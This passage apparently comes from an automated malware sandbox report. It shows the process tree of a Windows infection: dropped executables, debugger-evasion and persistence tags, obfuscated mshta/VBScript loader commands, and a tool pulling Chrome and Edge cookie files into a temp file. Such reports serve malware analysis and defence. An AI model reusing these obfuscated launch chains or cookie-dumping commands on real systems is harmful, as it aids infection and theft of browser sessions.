- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i15⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i16⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i17⤵
- Loads dropped DLL
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i18⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i19⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i20⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i21⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i22⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i23⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i24⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i25⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i26⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i27⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i28⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i29⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i30⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i31⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i32⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i33⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i34⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i35⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i36⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i37⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i38⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i39⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i40⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i41⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i42⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i43⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i44⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i45⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i46⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i47⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i48⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i49⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i50⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i51⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i52⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i53⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i54⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i55⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i56⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i57⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i58⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i59⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i60⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i61⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i62⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i63⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i64⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i65⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i66⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i67⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i68⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i69⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i70⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i71⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i72⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i73⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i74⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i75⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i76⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i77⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i78⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i79⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i80⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i81⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i82⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i83⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i84⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i85⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i86⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i87⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i88⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i89⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i90⤵
- Drops startup file
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"5⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\dpvEP8XiRj1c2qThi3uWmTK5.exe"C:\Users\Admin\Documents\dpvEP8XiRj1c2qThi3uWmTK5.exe"2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 2923⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\8X2oI4DszeVIWGY5HF5ZgMZV.exe"C:\Users\Admin\Documents\8X2oI4DszeVIWGY5HF5ZgMZV.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\8X2oI4DszeVIWGY5HF5ZgMZV.exeC:\Users\Admin\Documents\8X2oI4DszeVIWGY5HF5ZgMZV.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\qg3pGcM8ZPACbD9VogC1mDFV.exe"C:\Users\Admin\Documents\qg3pGcM8ZPACbD9VogC1mDFV.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4336 -s 3203⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\doxKUybrVR2_IWiztcp5Tm8e.exe"C:\Users\Admin\Documents\doxKUybrVR2_IWiztcp5Tm8e.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\7gUOHwRKPSs0bFEEgnFBP80d.exe"C:\Users\Admin\Documents\7gUOHwRKPSs0bFEEgnFBP80d.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\7gUOHwRKPSs0bFEEgnFBP80d.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\7gUOHwRKPSs0bFEEgnFBP80d.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\7gUOHwRKPSs0bFEEgnFBP80d.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\7gUOHwRKPSs0bFEEgnFBP80d.exe" ) do taskkill -f -iM "%~NxA"4⤵
-
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXEhbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS5⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "7gUOHwRKPSs0bFEEgnFBP80d.exe"5⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\wbrOEDPqZLlfOv_KfV8k0KPj.exe"C:\Users\Admin\Documents\wbrOEDPqZLlfOv_KfV8k0KPj.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 2763⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\Documents\nYgjBzd15DHj2zbHzYj9HqDT.exe"C:\Users\Admin\Documents\nYgjBzd15DHj2zbHzYj9HqDT.exe"2⤵
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\Documents\YdaH54yP_esQIQ4SlgOiDOhm.exe"C:\Users\Admin\Documents\YdaH54yP_esQIQ4SlgOiDOhm.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\T0iAlTpXG8CimmfcBecYAcGf.exe"C:\Users\Admin\Documents\T0iAlTpXG8CimmfcBecYAcGf.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\5JvdCjACao4A6TSmDYJoHSVJ.exe"C:\Users\Admin\Documents\5JvdCjACao4A6TSmDYJoHSVJ.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\LcD7kjOeNozczYKp5yKEV4sU.exe"C:\Users\Admin\Documents\LcD7kjOeNozczYKp5yKEV4sU.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv R21PVv4ZdEuhJ2sexbQ6nQ.0.21⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2240 -ip 22401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4180 -ip 41801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3632 -ip 36321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2512 -ip 25121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4488 -ip 44881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4244 -ip 42441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4336 -ip 43361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 3152 -ip 31521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1996 -ip 19961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1364 -ip 13641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 3156 -ip 31561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1656 -ip 16561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\C4F7.exeC:\Users\Admin\AppData\Local\Temp\C4F7.exe1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\D2B3.exeC:\Users\Admin\AppData\Local\Temp\D2B3.exe1⤵
-
